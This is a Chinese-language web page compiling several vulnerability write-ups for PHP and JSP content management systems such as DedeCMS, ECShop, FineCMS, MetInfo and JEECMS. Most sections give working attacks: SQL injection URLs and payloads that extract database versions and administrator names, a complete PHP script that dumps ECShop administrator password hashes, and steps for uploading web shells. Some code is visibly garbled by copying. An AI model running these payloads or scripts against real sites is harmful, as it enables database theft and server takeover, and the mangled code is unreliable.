以下是小编为大家准备的dedecms 5.7 edit.inc.php文件注射漏洞预警(共含10篇),希望对大家有帮助。同时,但愿您也能像本文投稿人“dzq8966799”一样,积极向本站投稿分享好文章。
漏洞文件edit.inc.php具体代码:
if(!defined('DEDEINC')) exit('Request Error!');
if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];
else $GUEST_BOOK_POS = “guestbook.php”;
$id = intval($id);
if(empty($job)) $job='view';
if($job=='del' && $g_isadmin)
{
$dsql->ExecuteNoneQuery(“ DELETE FROM `#@__guestbook` WHERE id='$id' ”);
ShowMsg(“成功删除一条留言!”, $GUEST_BOOK_POS);
exit;
}
else if($job=='check' && $g_isadmin)
{
$dsql->ExecuteNoneQuery(“ UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ”);
ShowMsg(“成功审核一条留言!”, $GUEST_BOOK_POS);
exit();
}
else if($job=='editok')
{
$remsg = trim($remsg);
if($remsg!='')
{
//管理员回复不过滤HTML
if($g_isadmin)
{
$msg = “”.$msg.“\n”.$remsg;
//$remsg
管理员回复:
}
else
{
$row = $dsql->GetOne(“SELECT msg From `#@__guestbook` WHERE id='$id' ”);
$oldmsg = “”.addslashes($row['msg']).“\n”;
$remsg = trimMsg(cn_substrR($remsg, 1024), 1);
$msg = $oldmsg.$remsg;
}
}
//这里没有对$msg过滤,导致可以任意注入了
$dsql->ExecuteNoneQuery(“UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='”.time().“' WHERE id='$id' ”);
ShowMsg(“成功更改或回复一条留言!”, $GUEST_BOOK_POS);
exit();
}
if($g_isadmin)
{
$row = $dsql->GetOne(“SELECT * FROM `#@__guestbook` WHERE id='$id'”);
require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');
}
else
{
$row = $dsql->GetOne(“SELECT id,title FROM `#@__guestbook` WHERE id='$id'”);
require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');
}
漏洞成功需要条件:
1. php magic_quotes_gpc=off
2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在,
dedecms 5.7 edit.inc.php文件注射漏洞预警
,
怎么判断是否存在漏洞:
先打开www.xxx.com /plus/guestbook.php 可以看到别人的留言,
然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
访问:www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=90sec'&id=存在的留言ID
提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 90sec' 如果变成了 那么证明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
如果没有修改成功,那留言ID的内容还是以前的 那就证明漏洞可以利用。
那么再次访问 www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='
然后返回,那条留言ID的内容就直接修改成了mysql 的user().
大概利用就是这样,大家有兴趣的多研究下!!
最后补充下,估计有人会说怎么暴管理后台帐户密码,你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)!!
可以看到没做过滤
------------------------------------
利用方法如下
1. demo.easethink.com/sms.php?act=subscribe 首先获得验证码!
将其拼接到下一步中的verify
2. demo.easethink.com/sms.php?act=do_subscribe&verify=这里是获得的验证码填写地址&mobile=111'and(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23
ok,没图没真相,上测试图
-----------------------------------------------------------------------
漏洞描述:这个漏洞很简单,上传没有过滤,注册账号之后去上传头像,jsp 都可以,会提示上传类型错误,弹出对话框,不用管它,关闭弹窗,点击右键查看源代码,你的代码已经上传上了,
JEECMS最新漏洞(文件上传)漏洞预警
,
上传后的格式为:
www.xxx.com/online/upload/M000000070500007/1349769169860.jsp?o=vLogin
漏洞文件:Client.Class.php 29行处
public static function get_user_ip { if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { $onlineip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) { $onlineip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $onlineip = getenv('REMOTE_ADDR'); } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $onlineip = $_SERVER['REMOTE_ADDR']; } return $onlineip; }/* 显然可以伪造一个client_ip进行注入 */
RegsiterController.php 145行处
private function reg($data) { if (empty($data)) return false; $data['groupid'] = 1; $data['regdate'] = time(); $data['regip'] = client::get_user_ip();//使用了get_user_ip的方法,漏洞就此产生. $data['status'] = $this->memberconfig['status'] ? 0 : 1; $data['modelid'] = (!isset($data['modelid']) || empty($data['modelid'])) ? $this->memberconfig['modelid'] : $data['modelid']; if (!isset($this->membermodel[$data['modelid']])) $this->memberMsg('会员模型不存在,请联系管理员,
Finecms 1.7.2注射漏洞漏洞预警
。'); if ($this->memberconfig['uc_use'] == 1) { if (uc_get_user($data['username'])) { $this->memberMsg('该用户无需注册,请直接登录激活!', url('member/login'), 1); } $uid = uc_user_register($data['username'], $data['password'], $data['email']); if ($uid <= 0) { if ($uid == -1) { $this->memberMsg('用户名不合法'); } elseif($uid == -2) { $this->memberMsg('包含要允许注册的词语'); } elseif($uid == -3) { $this->memberMsg('用户名已经存在'); } elseif($uid == -4) { $this->memberMsg('Email 格式有误'); } elseif($uid == -5) { $this->memberMsg('Email 不允许注册'); } elseif($uid == -6) { $this->memberMsg('该 Email 已经被注册'); } else { $this->memberMsg('未定义'); } } else { $username = $data['username']; } } $data['password'] = md5($data['password']); 34304 = $this->member->insert($data); return 34304; }Exp:
提交用户注册的时候,伪造一个client_ip,内容如下:
sb','1','6'),('hell','1b192f49ddec03d0c7e777d3e578cebf',(select username from fn_user where userid=1),'1','11111','sbd','1','6')#
成功之后,登陆用户:hell,密码:sbdan. 邮箱处就有管理员的user了.
ECShop2.5.x&2.6.x goods_script.php 没有初始化SQL,导致注射漏洞
影响2.5.x和2.6.x,其他版本未测试
goods_script.php44行:injection / admin credentials disclosure exploit
if (emptyempty($_GET['type'])) { ... } elseif ($_GET['type'] == 'collection') { ... } $sql .= “ LIMIT ” . (!emptyempty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10); $res = $db->query($sql);
$sql没有初始化,很明显的一个漏洞:)
EXP:
#!/usr/bin/php <= v2.6.2 SQL by puret_t mail: cnhackerx at 163 dot com team:hi.baidu.com/5427518dork: “Powered by ECShop” +---------------------------------------------------------------------------+ '); /** * works with register_globals = On */ if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to ecshop Example: php '.$argv[0].' localhost /ecshop/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $resp = send(); preg_match('#href=“([\S]+):([a-z0-9]{32})”#', $resp, $hash); if ($hash) exit(“Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n”); else exit(“Exploit Failed!\n”); function send() { global $host, $path; $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#'; $data = “POST ”.$path.“goods_script.php?type=”.time().“ HTTP/1.1\r\n”; $data .= “Accept: */*\r\n”; $data .= “Accept-Language: zh-cn\r\n”; $data .= “Content-Type: application/x-www-form-urlencoded\r\n”; $data .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n”; $data .= “Host: $host\r\n”; $data .= “Content-Length: ”.strlen($cmd).“\r\n”; $data .= “Connection: Close\r\n\r\n”; $data .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?>
发布日期:-07.19
发布作者:Ryat 影响版本:ECShop2.5.x&2.6.x
官方地址:www.ecshop.com
FineCMS是一款基于PHP+MySql开发的内容管理系统,采用MVC设计模式,实现业务逻辑与表现层的适当分离,使网页设计师能够轻松设计出理想的模板,
漏洞文件:
Client.Class.php 29行处:
public static function get_user_ip {
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
return $onlineip;
}
/* 显然可以伪造一个client_ip进行注入 */
RegsiterControll.php 145行处:
private function reg($data) {
if (empty($data)) return false;
$data['groupid'] = 1;
$data['regdate'] = time();
$data['regip'] = client::get_user_ip();//使用了存在漏洞的get_user_ip方法,漏洞就此产生
$data['status'] = $this->memberconfig['status'] ? 0 : 1;
$data['modelid'] = (!isset($data['modelid']) || empty($data['modelid'])) ? $this->memberconfig['modelid'] : $data['modelid'];
if (!isset($this->membermodel[$data['modelid']])) $this->memberMsg('会员模型不存在,请联系管理员。');
if ($this->memberconfig['uc_use'] == 1) {
if (uc_get_user($data['username'])) {
$this->memberMsg('该用户无需注册,请直接登录激活!', url('member/login'), 1);
}
$uid = uc_user_register($data['username'], $data['password'], $data['email']);
if ($uid <= 0) {
if ($uid == -1) {
$this->memberMsg('用户名不合法');
} elseif($uid == -2) {
$this->memberMsg('包含要允许注册的词语');
} elseif($uid == -3) {
$this->memberMsg('用户名已经存在');
} elseif($uid == -4) {
$this->memberMsg('Email 格式有误');
} elseif($uid == -5) {
$this->memberMsg('Email 不允许注册');
} elseif($uid == -6) {
$this->memberMsg('该 Email 已经被注册');
} else {
$this->memberMsg('未定义');
}
} else {
$username = $data['username'];
}
}
$data['password'] = md5($data['password']);
11518 = $this->member->insert($data);
return 11518;
}
漏洞利用:
EXP:提交用户注册的时候,伪造一个client_ip,内容如下:
sb’,’1’,’6’),(‘hell’,’1b192f49ddec03d0c7e777d3e578cebf’,(select username from fn_user where userid=1),’1’,’11111’,’sbd’,’1’,’6’)# 成功之后,登陆用户:hell,密码:sbdan. 邮箱处就有管理员的user了.
修补建议:
function get_user_ip(){
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
preg_match(“/[\d\.]{7,15}/”, $onlineip, $onlineipmatches);
$onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
return $onlineip;
}
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
作者: c4rp3nt3r@0x50sec.org
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
============
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
require_once(dirname(__FILE__).”/../include/common.inc.php”);
require_once(DEDEINC.”/arc.searchview.class.php”);
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
0id = (isset(0id) && is_numeric(0id)) ? 0id : 0;
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
if(!isset($orderby)) $orderby=”;
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
if(!isset($keyword)){
if(!isset($q)) $q = ”;
$keyword=$q;
}
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
//查找栏目信息
if(empty(0id))
{
0nameCacheFile = DEDEDATA.’/cache/typename.inc’;
if(!file_exists(0nameCacheFile) || filemtime(0nameCacheFile) < time()-(3600*24) )
{
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
fwrite($fp, “<”.”?php\r\n”);
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
$dsql->Execute();
while($row = $dsql->GetArray())
{
fwrite($fp, “\0Arr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
}
fwrite($fp, ‘?’.'>’);
fclose($fp);
}
//引入栏目缓存并看关键字是否有相关栏目内容
require_once(0nameCacheFile);
//0Arr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
//
if(isset(0Arr) && is_array(0Arr))
{
foreach(0Arr as $id=>0name)
{
$keywordn = str_replace(0name, ‘ ‘, $keyword); //这个地方要绕过
if($keyword != $keywordn)
{
$keyword = $keywordn;
0id = $id; // 这里存在变量覆盖漏洞使 0id = (isset(0id) && is_numeric(0id)) ? 0id : 0; 这句过滤成了摆设
break;
}
}
}
}
然后plus/search.php文件下面定义了一个 Search类的对象 .
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
$this->TypeLink = new TypeLink(0id);
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
class TypeLink
{
var 0Dir;
var $dsql;
var $TypeID;
var $baseDir;
var $modDir;
var $indexUrl;
var $indexName;
var $TypeInfos;
var $SplitSymbol;
var $valuePosition;
var $valuePositionName;
var $OptionArrayList;
//构造函数///////
//php5构造函数
function __construct(0id)
{
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
$this->indexName = $GLOBALS['cfg_indexname'];
$this->baseDir = $GLOBALS['cfg_basedir'];
$this->modDir = $GLOBALS['cfg_templets_dir'];
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
$this->dsql = $GLOBALS['dsql'];
$this->TypeID = 0id;
$this->valuePosition = ”;
$this->valuePositionName = ”;
$this->typeDir = ”;
$this->OptionArrayList = ”;
//载入类目信息
$query = “SELECT tp.*,ch.typename as
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
`#@__channeltype` ch
on ch.id=tp.channeltype WHERE tp.id=’0id’ “; //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
if(0id >0)
{
$this->TypeInfos = $this->dsql->GetOne($query);
利用代码一 需要 即使magic_quotes_gpc = Off
www.myhack58.com /plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
这只是其中一个利用代码… Search 类的构造函数再往下
……省略
$this->TypeID = 0id;
……省略
if($this->TypeID==”0″){
$this->ChannelTypeid=1;
}else{
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
//现在不鸡肋了吧亲…
$this->ChannelTypeid=$row['channeltype'];
}
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
www.myhack58.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
MetInfo 23号发布了新版本5.1.5,修补了本文提到的漏洞,当然严格来说应该是任意变量覆盖漏洞....
ps:欢迎各种形式,首发t00ls.net
注:请勿利用本文内容从事一切非法活动,否则后果自负
author:my5t3ry
废话不多说,看代码:
include\common.inc.php20-39$db_settings=parse_ini_file(ROOTPATH.'config/config_db.php');@extract($db_settings);require_once ROOTPATH.'include/mysql_class.php';$db=newdbmysql;$db->dbconn($con_db_host,$con_db_id,$con_db_pass,$con_db_name);define('MAGIC_QUOTES_GPC',get_magic_quotes_gpc());isset($_REQUEST['GLOBALS'])&&exit('Access Error');require_once ROOTPATH.'include/global.func.php';foreach(array('_COOKIE','_POST','_GET')as$_request){foreach($$_requestas$_key=>$_value){$_key{0}!='_'&&$$_key=daddslashes($_value);}}$query=“select * from {$tablepre}config where name='met_tablename' and lang='metinfo'”;$mettable=$db->get_one($query);$mettables=explode('|',$mettable[value]);foreach($mettablesas$key=>$val){$tablename='met_'.$val;$$tablename=$tablepre.$val;}
metinfo系统通过查询数据库的{$tablepre}config表,并将获取的结果通过foreach循环初始化表名变量,其中的
是通过代码
$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php'); @extract($db_settings);
来初始化的,然后在系统中使用这样“SELECT * FROM $met_message where id=$id and lang='$lang'”的SQL查询数据库,
其中的$met_message变量就是前面foreach循环初始化的变量……
我们可以覆盖$tablepre变量使表名初始化失败,进而提交表名变量.....
我找了个后台的上传页面,通过覆盖变量绕过后台验证并且覆盖允许上传后缀列表,构造上传漏洞,
MetInfov5.1.3 任意文件上传漏洞漏洞预警
,
exp:任意文件上传
任意文件上传
简要描述:
允许上传危险文件类型,这个系统用的还是不少的
打开网络课网站,如图,登陆进去,现在网盘里传一个PHP文件,网盘竟然没过滤PHP文件,
进入后选择使用网盘文件,然后选择php文件,在切换到HTML下,就可以看到这个PHP文件在服务器上路径了,xxx.xxx.cn/SCR/Course … 31/111026085064.php,执行的时候好像不能写php大马,写个asp上去就可以了,
这个系统数据库用户用的是sa,有点。。
KCFinder 2.X上传页未进行严格过滤,导致文件上传漏洞,
1.Go to target link
localhost/KCFinder/browse.php
2.upload your shell as [shell.php.jpg]
注:只适用于linux系统的解析漏洞,
★ shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警
★ eWebeditoR3.8 for php任意文件上传EXP漏洞预警
★ ECSHOP跨站+后台文件包含=Getshell漏洞预警
